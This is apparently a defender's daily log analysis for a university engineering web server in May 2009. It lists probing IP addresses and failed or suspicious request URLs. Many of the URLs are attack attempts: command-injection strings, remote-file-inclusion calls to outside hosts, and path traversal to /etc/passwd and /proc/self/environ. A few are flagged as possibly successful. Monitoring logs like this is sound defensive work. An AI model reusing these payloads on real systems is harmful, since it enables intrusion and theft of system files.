/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6254 ... MVER=4&CAPREQ=0: 3 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 1 Time(s)
/Papers/ASNE2002Paper.pdf: 1 Time(s)
/Space/archives/000786.html: 4 Time(s)
/_vti_bin/_vti_aut/author.dll: 1 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6211 ... MVER=4&CAPREQ=0: 1 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6254 ... MVER=4&CAPREQ=0: 3 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 1 Time(s)
/_vti_bin/shtml.exe/_vti_rpc: 4 Time(s)
/_vti_inf.html: 4 Time(s)
/awstats.pl?configdir=%7Cecho%20;echo%20;i ... o%20;echo%20%7C: 1 Time(s)
/cgi-bin/MachineInfo/cgi-bin/wrap/gurdal/: 1 Time(s)
/cgi-bin/acart/acart.pl?&page=%7Cuname%20-a;pwd;id%7C: 1 Time(s)
/cgi-bin/awstats.pl?configdir=%7Cecho%20;e ... o%20;echo%20%7C: 1 Time(s)
/cgi-bin/index.cgi?page=%7Cuname%20-a;id%7C: 1 Time(s)
/cgi-bin/kerbynet?Section=NoAuthREQ&Action ... ype=*%22;id;%22: 1 Time(s)
/cgi-bin/mt/mt-comments.cgi: 2 Time(s)
/cgi-bin/mt/mt-comments.cgi?entry_id=1330: 1 Time(s)
/cgi-bin/mt/mt-comments.cgi?entry_id=449: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1134: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1329: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1330: 1 Time(s)
/cgi-bin/news.cgi?id=%7Cid%7C: 1 Time(s)
/cgi-bin/quikstore.cgi?category=%7Cid%7C: 1 Time(s)
/cgi-bin/shop.pl/page=%7Cid%7C: 1 Time(s)
/cgi-sys/guestbook.cgi?user=cpanel&template=%7Cid%7C: 1 Time(s)
/computing/faq/displayfaq.php?area_id=5: 1 Time(s)
/main.cgi/file.txt?down_num=953713356&boar ... ile.txt%7Cid%7C: 1 Time(s)
/organizations/aiaa/gallery/gallery1/0708officers.JPG: 1 Time(s)
/organizations/aiaa/gallery/gallery1/officer2008.jpg: 1 Time(s)
/organizations/aiaa/gallery/gallery2/01-0412080919.jpg: 1 Time(s)
/organizations/aiaa/gallery/index.php?gal=3&pic=2: 1 Time(s)
/organizations/aiaa/gallery/index.php?gal=4&pic=1: 1 Time(s)
/organizations/aiaa/gallery/index.php?gal=4&pic=10: 1 Time(s)
/organizations/aiaa/gallery/index.php?gal=4&pic=11: 1 Time(s)
/organizations/aiaa/index.php?go=calendar: 1 Time(s)
/organizations/aiaa/index.php?go=contacts: 2 Time(s)
/organizations/aiaa/index.php?go=links: 1 Time(s)
/organizations/aiaa/index.php?go=whatwedo: 2 Time(s)
/organizations/index.php?inc=http://indoir ... o/idscan.txt???: 1 Time(s)
/organizations/vtsgt/gallery/add_comment.p ... lery_popup=true: 1 Time(s)
/organizations/vtsgt/index.php?inc=http:// ... o/idscan.txt???: 1 Time(s)
/research/thesis/?mode=area_selected&thesis_area=1: 1 Time(s)
/research/thesis/?mode=area_selected&thesis_area=2: 1 Time(s)
/research/thesis/?mode=area_selected&thesis_area=4: 2 Time(s)
/saffairs/pages/r/?Trans-union-free-credit-report-1/: 1 Time(s)
/search.php: 14 Time(s)
/services/help/?show=about&module=;%22.passthru(%22id%22);: 1 Time(s)
/shop.pl/page=%7Cid%7C: 1 Time(s)
/skin_shop/standard/3_plugin_twindow/twind ... /scripts/test??: 1 Time(s)
/technote/main.cgi/file.txt?down_num=95371 ... ile.txt%7Cid%7C: 1 Time(s)
/twiki/bin/configure?action=image;image=%7Cid%7C;type=text: 1 Time(s)
/undergraduate: 1 Time(s)
/~cwoolsey//photo_comment.php?toroot=http: ... m/2009/id.txt??: 1 Time(s)
/~cwoolsey/Advisees//photo_comment.php?tor ... m/2009/id.txt??: 1 Time(s)
/~cwoolsey/Advisees/Undergraduate//ee_comm ... MADONGCMD.txt??: 3 Time(s)
/~cwoolsey/Advisees/Undergraduate//photo_c ... m/2009/id.txt??: 1 Time(s)
/~cwoolsey/Advisees/Undergraduate/FaruqueA ... MADONGCMD.txt??: 3 Time(s)
/~cwoolsey/Advisees/Undergraduate/FaruqueA ... m/2009/id.txt??: 1 Time(s)
/~hokiesat/subs/wiring//include/admin.lib. ... s/93/yes.txt???: 1 Time(s)
/~hokiesat/subs/wiring/New%20Stuff//includ ... s/93/yes.txt???: 1 Time(s)
/~lscharf/scripts/homepages.php.txt%20%20/ ... br/fx29id.txt??: 1 Time(s)
/~lscharf/scripts/homepages.php.txt%20%20/ ... t/fx29id1.txt??: 1 Time(s)
/~mason//include/print_category.php?setup[ ... wap.sh/id.txt??: 2 Time(s)
/~mason//photo_comment.php?toroot=http://w ... m/2009/id.txt??: 1 Time(s)
/~mason/Mason/http%20://www.aoe.vt.edu/~ma ... /ACinfoTOC.html: 1 Time(s)
/~mason/Mason_f//ee_commerce/paypalcart.ph ... MADONGCMD.txt??: 1 Time(s)
/~mason/Mason_f//include/print_category.ph ... wap.sh/id.txt??: 2 Time(s)
/~mason/Mason_f//photo_comment.php?toroot= ... m/2009/id.txt??: 1 Time(s)
/~mason/Mason_f/747CONF.INP//include/print ... wap.sh/id.txt??: 2 Time(s)
/~mason/Mason_f/M96SAE.pdf//include/print_ ... wap.sh/id.txt??: 1 Time(s)
/~mason/Mason_f/MorphFinalRptF03.pdf%20%20 ... m/2009/id.txt??: 1 Time(s)
/~mason/Mason_f/MorphFinalRptF03.pdf//ee_c ... MADONGCMD.txt??: 1 Time(s)
/~mason/Mason_f/favicon.ico: 4 Time(s)
/~mason/Mason_f/skin_shop/standard/3_plugi ... /scripts/test??: 1 Time(s)
http://www.aoe.vt.edu/~devenpor/aoe5104/2% ... 2520Algebra.pdf: 1 Time(s)
405 Method Not Allowed
/~cdhall/: 1 Time(s)
/~hokiesat/: 6 Time(s)
/~mason/: 3 Time(s)
</code>

===== May 17, 2009 Log Analysis =====

A total of 2 sites probed the server:

<code>
132.205.95.71
174.35.250.57
</code>

<code>
404's
//assets/snippets/reflect/snippet.reflect. ... /scripts/test??: 1 Time(s)
//components/com_extcalendar/errors.php?er ... s/kampret.jpg??: 1 Time(s)
//include/print_category.php?setup[use_cat ... wap.sh/id.txt??: 2 Time(s)
//skin/zero_vote/setup.php?%20dir=http://d ... wap.sh/id.txt??: 3 Time(s)
/3DLDV/wb23000/data.html: 1 Time(s)
/alumni/alumnilist.php?class=http://owned- ... luelinebe.html?: 3 Time(s)
/cgi-bin/mt/mt-comments.cgi: 2 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1331: 1 Time(s)
/computing/faq/displayfaq.php?area_id=3: 2 Time(s)
/computing/faq/displayfaq.php?area_id=4: 1 Time(s)
/organizations/aiaa/show_news.php?cutepath ... og/fx29id.txt??: 1 Time(s)
/organizations/show_news.php?cutepath=http ... og/fx29id.txt??: 1 Time(s)
/show_news.php?cutepath=http://212.227.74. ... og/fx29id.txt??: 1 Time(s)
/~mason//include/print_category.php?setup[ ... wap.sh/id.txt??: 2 Time(s)
/~mason//skin/zero_vote/setup.php?%20dir=h ... wap.sh/id.txt??: 3 Time(s)
/~mason/Mason/ACiX29.htmlects/s37/index.ht ... tml\x9f\xfe\xff: 1 Time(s)
/~mason/Mason/http%20://www.aoe.vt.edu/~ma ... /ACinfoTOC.html: 1 Time(s)
/~mason/Mason_f//assets/snippets/reflect/s ... /scripts/test??: 1 Time(s)
/~mason/Mason_f//include/print_category.ph ... wap.sh/id.txt??: 2 Time(s)
/~mason/Mason_f//skin/zero_vote/setup.php? ... wap.sh/id.txt??: 3 Time(s)
/~mason/Mason_f/747CONF.INP//include/print ... wap.sh/id.txt??: 2 Time(s)
/~mason/Mason_f/747CONF.INP//skin/zero_vot ... wap.sh/id.txt??: 2 Time(s)
/~mason/Mason_f/M96SAE.pdf//include/print_ ... wap.sh/id.txt??: 1 Time(s)
/~mason/Mason_f/M96SAE.pdf//skin/zero_vote ... wap.sh/id.txt??: 3 Time(s)
</code>

===== May 18, 2009 Log Analysis =====

A total of 8 sites probed the server:

<code>
189.8.13.18
208.94.173.99
217.218.82.15
58.214.162.140
79.233.147.7
80.191.127.196
82.19.44.18
94.169.92.137
</code>

<code>
403's
/research/: 13 Time(s)
/research/?area_id=1: 2 Time(s)
/research/?area_id=2: 3 Time(s)
/research/?area_id=3: 1 Time(s)
/research/?area_id=4: 1 Time(s)
/research/?area_id=5: 1 Time(s)
/research/?area_id=6: 1 Time(s)
404's
/%7Eciochett/lit/zen.html: 1 Time(s)
/%7Emason/Mason_f/errors.php?error=http:// ... hu/buggsbunny??: 1 Time(s)
/%7Emason/Mason_f/source/mod/rss/viewitem. ... hu/buggsbunny??: 1 Time(s)
/%7Emason/Mason_f/source/mod/rss/viewitem. ... oc/self/environ: 1 Time(s)
/%7Emason/Mason_f/source/mod/rss/viewitem. ... self/environ%00: 1 Time(s)
/%7Emason/errors.php?error=http://www.fmf2 ... hu/buggsbunny??: 1 Time(s)
/%7Emason/source/mod/rss/viewitem.php?Code ... hu/buggsbunny??: 1 Time(s)
/%7Emason/source/mod/rss/viewitem.php?Code ... oc/self/environ: 1 Time(s)
/%7Emason/source/mod/rss/viewitem.php?Code ... self/environ%00: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 1 Time(s)
/\xef\xbd\x9emason/Mason_f/icase_paper95.pdf: 1 Time(s)
/alumni/news.php?gashar=GASHAR&back_eval=p ... =SBD_MAKE_VOICE: 1 Time(s)
/cart.php?category_id=': 2 Time(s)
/cgi-bin/mt/mt-comments.cgi: 2 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1331: 1 Time(s)
/display.php?pg=http://www.5d-gaming.org/b/iid.txt??: 1 Time(s)
/errors.php?error=http://www.fmf2004.hu/buggsbunny??: 1 Time(s)
/ferror.txt: 1 Time(s)
/forum/index.php: 1 Time(s)
/forums/index.php: 1 Time(s)
/news.php?_SERVER[DOCUMENT_ROOT]=http://ww ... ote_log/ec.txt?: 2 Time(s)
/organizations/aiaa/index.php?go=../../../ ... ./../etc/passwd: 1 Time(s)
/organizations/aiaa/index.php?go=../../../ ... ./etc/passwd%00: 2 Time(s)
/organizations/aiaa/index.php?go=contacts: 2 Time(s)
/organizations/aiaa/index.php?go=links: 1 Time(s)
/organizations/aiaa/index.php?go=whatwedo: 1 Time(s)
/organizations/aiaa/index.php?start_from=2 ... subaction=&id=&: 1 Time(s)
/organizations/sname/ingalls02pics/plas%25 ... 2520cutting.jpg: 2 Time(s)
/organizations/sname/ingalls02pics/plate%2 ... las%2520arc.jpg: 2 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=408: 1 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=409: 1 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=413: 1 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=414: 1 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=419: 1 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=420: 1 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=421: 1 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=422: 1 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=424: 1 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=425: 1 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=426: 1 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=427: 2 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=428: 2 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=429: 1 Time(s)
/organizations/sname/ingalls02pics2.html&h ... hl=en&start=480: 1 Time(s)
/source/mod/rss/viewitem.php?Codebase=../. ... oc/self/environ: 1 Time(s)
/source/mod/rss/viewitem.php?Codebase=../. ... self/environ%00: 1 Time(s)
/source/mod/rss/viewitem.php?Codebase=http ... hu/buggsbunny??: 1 Time(s)
/~dare/me/punk/rocker.html: 1 Time(s)
/~elseifi: 1 Time(s)
/~grasmeye/photos/allison/: 2 Time(s)
/~grasmeye/photos/allison/billstory.html: 1 Time(s)
/~grasmeye/photos/index.html: 2 Time(s)
405 Method Not Allowed
/ferror.txt: 1 Time(s)
/~hokiesat/: 1 Time(s)
/~mason/: 1 Time(s)
416 Request Range Not Satisfiable
/~kashin/courses/aoe4065/Files/SystemAnalysis.pdf: 1 Time(s)
</code>

===== May 19, 2009 Log Analysis =====

A total of 7 sites probed the server:

<code>
121.246.105.26
140.159.2.32
141.212.51.1
59.180.142.136
76.4.48.141
90.215.231.235
91.212.16.8
</code>

<code>
400 Bad Request
www.aoe.vt.edu/news/news.php?gashar=GASHAR ... =SBD_MAKE_VOICE: 1 Time(s)
404's
///google.ro/path=http://208.98.22.241/id.txt????: 1 Time(s)
//bemarket/postscript/postscript.php?p_mod ... load/pw.txt????: 1 Time(s)
//board/board.php?code=http://163.26.12.232/gambar.jpg???: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6211 ... MVER=4&CAPREQ=0: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6551 ... MVER=4&CAPREQ=0: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 2 Time(s)
/calendars/phpScheduleIt/reserve.php: 1 Time(s)
/calendars/phpScheduleIt/roschedule.php?da ... 008&scheduleid=: 1 Time(s)
/cgi-bin/mt/mt-comments.cgi: 4 Time(s)
/cgi-bin/mt/mt-comments.cgi?entry_id=1330: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1134: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1329: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1331: 1 Time(s)
/people//board/board.php?code=http://163.2 ... 2/gambar.jpg???: 1 Time(s)
/~cwoolsey/Courses/AOE3134/Supplemental/// ... .241/id.txt????: 1 Time(s)
/~cwoolsey/Courses/AOE3134/Supplemental/Ro ... .241/id.txt????: 1 Time(s)
/~gaylord//bemarket/postscript/postscript. ... load/pw.txt????: 1 Time(s)
/~gaylord/ps.to.eps.html//bemarket/postscr ... load/pw.txt????: 1 Time(s)
</code>

===== May 20, 2009 Log Analysis =====

A total of 4 sites probed the server:

<code>
143.248.72.100
205.243.148.151
67.19.50.178
90.55.42.112
</code>

A total of 3 possible successful probes were detected (the following URLs contain strings that match one or more of a listing of strings that indicate a possible exploit):

<code>
/index.php?body=../../../../../../../../../../../../../etc/passwd%00   HTTP Response 200
/~lscharf/scripts/homepages.php.txt/index.php?body=../../../../../../../../../../../../../etc/passwd%00   HTTP Response 200
/~lscharf/scripts/index.php?body=../../../../../../../../../../../../../etc/passwd%00   HTTP Response 200
</code>

<code>
Requests with error response codes
400 Bad Request
HTTP/1.1: 10 Time(s)
404's
//photo_comment.php?toroot=http://www.die- ... ad/fx29id.txt??: 1 Time(s)
/3DLDV/wb23000/data.html: 2 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6551 ... MVER=4&CAPREQ=0: 2 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 4 Time(s)
/Papers/ASNE2002Paper.pdf: 1 Time(s)
/Papers/SNAME2003Grounding2.pdf: 1 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6551 ... MVER=4&CAPREQ=0: 2 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 4 Time(s)
/_vti_bin/shtml.exe/_vti_rpc: 4 Time(s)
/_vti_inf.html: 4 Time(s)
/cgi-bin/MachineInfo/cgi-bin/wrap/gurdal/: 1 Time(s)
/cgi-bin/mt/mt-comments.cgi: 1 Time(s)
/cgi-bin/mt/mt-comments.cgi?entry_id=1329: 1 Time(s)
/cgi-bin/mt/mt-search.cgi?IncludeBlogs=2&s ... ower+system+ppt: 1 Time(s)
/include/images/trans.gif: 113 Time(s)
/include/lib.inc.php?site_path=http://www. ... aries/id.txt???: 2 Time(s)
/mail//bin/msgimport: 5 Time(s)
/mail2//bin/msgimport: 5 Time(s)
/mss2//bin/msgimport: 5 Time(s)
/notified-DSTA?aHR0cDovL3d3dy5hb2UudnQuZWR ... 0YxNlMwNC5wZGY=: 1 Time(s)
/notified-DSTA?aHR0cDovL3d3dy5hb2UudnQuZWR ... 29uaWNzLnBkZg==: 1 Time(s)
/pubs/catalog/c523.htm: 1 Time(s)
/rc//bin/msgimport: 5 Time(s)
/rms//bin/msgimport: 5 Time(s)
/round//bin/msgimport: 5 Time(s)
/roundcube-0.1//bin/msgimport: 5 Time(s)
/roundcube-0.2//bin/msgimport: 5 Time(s)
/roundcube//bin/msgimport: 5 Time(s)
/roundcubemail-0.1//bin/msgimport: 5 Time(s)
/roundcubemail-0.2//bin/msgimport: 5 Time(s)
/roundcubemail//bin/msgimport: 5 Time(s)
/search.php: 6 Time(s)
/sitemap.xml: 1 Time(s)
/verify-DSTA?aHR0cDovL3d3dy5hb2UudnQuZWR1L ... 0YxNlMwNC5wZGY=: 1 Time(s)
/verify-DSTA?aHR0cDovL3d3dy5hb2UudnQuZWR1L ... 29uaWNzLnBkZg==: 1 Time(s)
/webmail//bin/msgimport: 5 Time(s)
/webmail2//bin/msgimport: 5 Time(s)
/wm//bin/msgimport: 5 Time(s)
/~cdhall/MyMaps/Usage%20&%20FAQ.txt//?file ... ips_w/id.txt???: 1 Time(s)
/~cwoolsey//photo_comment.php?toroot=http: ... ad/fx29id.txt??: 1 Time(s)
/~cwoolsey/Advisees//photo_comment.php?tor ... ad/fx29id.txt??: 1 Time(s)
/~cwoolsey/Advisees/Undergraduate//photo_c ... ad/fx29id.txt??: 1 Time(s)
/~cwoolsey/Advisees/Undergraduate/FaruqueA ... ad/fx29id.txt??: 1 Time(s)
/~hokiesat/hsat_files/filelist.xml: 1 Time(s)
/~hokiesat/include/lib.inc.php?site_path=h ... aries/id.txt???: 2 Time(s)
/~hokiesat/subs/gps-crosslink/Final%20APL% ... tation/out.html: 1 Time(s)
/~hokiesat/subs/include/lib.inc.php?site_p ... aries/id.txt???: 2 Time(s)
/~hokiesat/subs/power/S02%20documenta...ec ... ia/Roseid.txtt?: 3 Time(s)
/~hokiesat/subs/wiring/New%20Stuff/Big%20B ... aries/id.txt???: 2 Time(s)
/~hokiesat/subs/wiring/New%20Stuff/include ... aries/id.txt???: 2 Time(s)
/~hokiesat/subs/wiring/include/lib.inc.php ... aries/id.txt???: 2 Time(s)
/~mason/Mason_f/M96SC10.pdf//?f=http://www ... ia/Roseid.txtt?: 3 Time(s)
405 Method Not Allowed
/~hokiesat/: 6 Time(s)
/~mason/: 3 Time(s)
416 Request Range Not Satisfiable
/~mason/Mason_f/ConfigAeroHiLift.pdf: 1 Time(s)
</code>

===== May 20, 2009 Log Analysis =====

A total of 6 sites probed the server:

<code>
188.129.88.254
193.109.135.145
200.234.200.158
210.5.217.218
65.23.154.225
85.241.26.61
</code>

A total of 2 possible successful probes were detected (the following URLs contain strings that match one or more of a listing of strings that indicate a possible exploit):

<code>
/index.php?go=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ   HTTP Response 200
/index.php?go=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00   HTTP Response 200
</code>

<code>
400 Bad Request
/404.shtml: 1 Time(s)
/w00tw00t.at.ISC.SANS.DFind:): 1 Time(s)
403 Forbidden
/research/: 20 Time(s)
/research/?area_id=4: 1 Time(s)
/research/?area_id=6: 1 Time(s)
/research/?mode=area_selected&thesis_area=1: 1 Time(s)
/research/?mode=area_selected&thesis_area=2: 1 Time(s)
/research/?mode=area_selected&thesis_area=3: 1 Time(s)
/research/?mode=area_selected&thesis_area=4: 1 Time(s)
/research/?mode=area_selected&thesis_area=5: 1 Time(s)
/research/?mode=area_selected&thesis_area=6: 1 Time(s)
/robots.txt: 33 Time(s)
404 Not Found
/%7Emason/Mason_f/errors.php?error=http:// ... ca/buggsbunny??: 1 Time(s)
/%7Emason/Mason_f/source/mod/rss/view.php? ... ca/buggsbunny??: 1 Time(s)
/%7Emason/Mason_f/source/mod/rss/view.php? ... oc/self/environ: 1 Time(s)
/%7Emason/Mason_f/source/mod/rss/view.php? ... self/environ%00: 1 Time(s)
/%7Emason/errors.php?error=http://www.long ... ca/buggsbunny??: 1 Time(s)
/%7Emason/source/mod/rss/view.php?Codebase ... ca/buggsbunny??: 1 Time(s)
/%7Emason/source/mod/rss/view.php?Codebase ... oc/self/environ: 1 Time(s)
/%7Emason/source/mod/rss/view.php?Codebase ... self/environ%00: 1 Time(s)
////Packages.php?sourcedir=http://dunpo.wi ... et/id.txt?%0D??: 2 Time(s)
//beacon/language/1/splash.lang.php?langua ... oc/self/environ: 1 Time(s)
//beacon/language/1/splash.lang.php?langua ... self/environ%00: 1 Time(s)
//include/bbs.lib.inc.php?site_path=http:/ ... data/idfx1.txt?: 1 Time(s)
//new.php?id=http://80.24.176.145/time//appserv/file.txt???: 1 Time(s)
//photo_comment.php?toroot=http://rsh.kiev ... ges/idfx1.txt??: 2 Time(s)
//plugins/dbal.php?eqdkp_root_path=http:// ... aries/id.txt???: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6254 ... MVER=4&CAPREQ=0: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6551 ... MVER=4&CAPREQ=0: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 5 Time(s)
/_vti_bin/_vti_aut/author.dll: 2 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6254 ... MVER=4&CAPREQ=0: 1 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6551 ... MVER=4&CAPREQ=0: 1 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 5 Time(s)
/_vti_bin/shtml.exe/_vti_rpc: 4 Time(s)
/_vti_inf.html: 4 Time(s)
/a: 1 Time(s)
/cgi-bin/mt/mt-comments.cgi: 3 Time(s)
/cgi-bin/mt/mt-comments.cgi?entry_id=1329: 3 Time(s)
/cgi-bin/mt/mt-comments.cgi?entry_id=1330: 3 Time(s)
/cgi-bin/mt/mt-comments.cgi?entry_id=1331: 4 Time(s)
/cgi-bin/mt/mt-search.cgi?IncludeBlogs=2&s ... esigns+for+kids: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi/1202: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1329: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1330: 1 Time(s)
/cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1331: 1 Time(s)
/errors.php?error=http://www.longbeachphot ... ca/buggsbunny??: 3 Time(s)
/favicon.ico: 24 Time(s)
/general.php: 22 Time(s)
/giving/general.php: 1 Time(s)
/giving/wishlist.php: 2 Time(s)
/groups/caplab/research/capvte: 1 Time(s)
/help/login.php?PHPSESSID=02c369bd3ef20d55d6142b896b18b2f9: 1 Time(s)
/home.php?pg=../../../../../../../../../.. ... oc/self/environ: 1 Time(s)
/home.php?pg=../../../../../../../../../.. ... self/environ%00: 1 Time(s)
/home.php?pg=http://www.longbeachphotosbc.ca/buggsbunny??: 1 Time(s)
/news//new.php?id=http://80.24.176.145/tim ... erv/file.txt???: 1 Time(s)
/organizations//beacon/language/1/splash.l ... oc/self/environ: 1 Time(s)
/organizations//beacon/language/1/splash.l ... self/environ%00: 1 Time(s)
/organizations/aiaa: 1 Time(s)
/organizations/aiaa/: 3 Time(s)
/organizations/aiaa//beacon/language/1/spl ... oc/self/environ: 1 Time(s)
/organizations/aiaa//beacon/language/1/spl ... self/environ%00: 1 Time(s)
/organizations/aiaa/errors.php?error=http: ... ca/buggsbunny??: 2 Time(s)
/organizations/aiaa/home.php?pg=../../../. ... oc/self/environ: 1 Time(s)
/organizations/aiaa/home.php?pg=../../../. ... self/environ%00: 1 Time(s)
/organizations/aiaa/home.php?pg=http://www ... ca/buggsbunny??: 1 Time(s)
/organizations/aiaa/images/Joshua_Davidson_Personal.jpg: 1 Time(s)
/organizations/aiaa/index.php: 1 Time(s)
/organizations/aiaa/index.php?go=../../../ ... oc/self/environ: 1 Time(s)
/organizations/aiaa/index.php?go=../../../ ... self/environ%00: 1 Time(s)
/organizations/aiaa/index.php?go=companies: 1 Time(s)
/organizations/aiaa/index.php?go=contacts: 3 Time(s)
/organizations/aiaa/index.php?go=http://ww ... ca/buggsbunny??: 1 Time(s)
/organizations/aiaa/index.php?go=links: 2 Time(s)
/organizations/aiaa/index.php?go=whatisaiaa: 1 Time(s)
/organizations/aiaa/index.php?go=whatwedo: 1 Time(s)
/organizations/aiaa/index.php?start_from=0 ... &subaction=&id=: 1 Time(s)
/organizations/aiaa/index.php?start_from=2 ... &subaction=&id=: 1 Time(s)
/organizations/aiaa/lutze/health/canadian- ... acy-viagra.html: 1 Time(s)
/organizations/aiaa/lutze/health/viagra-ca ... acy-dosage.html: 1 Time(s)
/organizations/errors.php?error=http://www ... ca/buggsbunny??: 2 Time(s)
/organizations/home.php?pg=../../../../../ ... oc/self/environ: 1 Time(s)
/organizations/home.php?pg=../../../../../ ... self/environ%00: 1 Time(s)
/organizations/home.php?pg=http://www.long ... ca/buggsbunny??: 1 Time(s)
/organizations/index.php: 1 Time(s)
/organizations/index.php?go=../../../../.. ... oc/self/environ: 1 Time(s)
/organizations/index.php?go=../../../../.. ... self/environ%00: 1 Time(s)
/organizations/index.php?go=companies: 1 Time(s)
/organizations/index.php?go=contacts: 1 Time(s)
/organizations/index.php?go=http://www.lon ... ca/buggsbunny??: 1 Time(s)
/organizations/index.php?go=links: 1 Time(s)
/organizations/index.php?go=whatisaiaa: 1 Time(s)
/organizations/index.php?go=whatwedo: 1 Time(s)
/source/mod/rss/view.php?Codebase=../../.. ... oc/self/environ: 1 Time(s)
/source/mod/rss/view.php?Codebase=../../.. ... self/environ%00: 1 Time(s)
/source/mod/rss/view.php?Codebase=http://w ... ca/buggsbunny??: 1 Time(s)
/sources/lostpw.php?CONFIG[path]=http://du ... et/id.txt?%0D??: 2 Time(s)
/~cdhall/papers/AIAA-11014-738.pdf//?r=htt ... om/fx29id.txt??: 1 Time(s)
/~cwoolsey//photo_comment.php?toroot=http: ... ges/idfx1.txt??: 2 Time(s)
/~cwoolsey//plugins/dbal.php?eqdkp_root_pa ... aries/id.txt???: 1 Time(s)
/~cwoolsey/Advisees//photo_comment.php?tor ... ges/idfx1.txt??: 2 Time(s)
/~cwoolsey/Advisees/Undergraduate//photo_c ... ges/idfx1.txt??: 2 Time(s)
/~cwoolsey/Advisees/Undergraduate/FaruqueA ... ges/idfx1.txt??: 2 Time(s)
/~cwoolsey/Courses//plugins/dbal.php?eqdkp ... aries/id.txt???: 1 Time(s)
/~cwoolsey/Courses/AOE3134//plugins/dbal.p ... aries/id.txt???: 1 Time(s)
/~cwoolsey/Courses/AOE3134/Supplemental//p ... aries/id.txt???: 1 Time(s)
/~cwoolsey/Courses/AOE3134/Supplemental/Ro ... aries/id.txt???: 2 Time(s)
/~durham/AOE5214/Ch08.pdf//?x=http://www.r ... a2/drivid.txt??: 1 Time(s)
/~hokiesat//include/bbs.lib.inc.php?site_p ... data/idfx1.txt?: 1 Time(s)
/~hokiesat/Plans_Procedures_and_Results/Te ... es/editdata.mso: 2 Time(s)
/~hokiesat/index2_files/filelist.xml: 1 Time(s)
/~hokiesat/subs//include/bbs.lib.inc.php?s ... data/idfx1.txt?: 1 Time(s)
/~hokiesat/subs/wiring//include/bbs.lib.in ... data/idfx1.txt?: 1 Time(s)
/~hokiesat/subs/wiring/New%20Stuff//includ ... data/idfx1.txt?: 1 Time(s)
/~hokiesat/subs/wiring/New%20Stuff/Big%20B ... data/idfx1.txt?: 1 Time(s)
/~lscharf/scripts/homepages.php.txt%20%20/ ... om/fx29id.txt??: 2 Time(s)
/~mason//photo_comment.php?toroot=http://r ... ges/idfx1.txt??: 2 Time(s)
/~mason/Mason////Packages.php?sourcedir=ht ... et/id.txt?%0D??: 2 Time(s)
/~mason/Mason/ACinfoTOC.html////Packages.p ... et/id.txt?%0D??: 2 Time(s)
/~mason/Mason/ACinfoTOC.html//?sourcedir=h ... .241/id.txt????: 1 Time(s)
/~mason/Mason/ACinfoTOC.html//?sourcedir=h ... et/id.txt?%0D??: 2 Time(s)
/~mason/Mason/ACinfoTOC.html/sources/lostp ... et/id.txt?%0D??: 2 Time(s)
/~mason/Mason/sources/lostpw.php?CONFIG[pa ... et/id.txt?%0D??: 2 Time(s)
/~mason/Mason_f//photo_comment.php?toroot= ... ges/idfx1.txt??: 2 Time(s)
/~mason/Mason_f/M96SC10.pdf//?f=http://www ... ia/Roseid.txtt?: 1 Time(s)
/~mason/Mason_f/MailOrder.html: 1 Time(s)
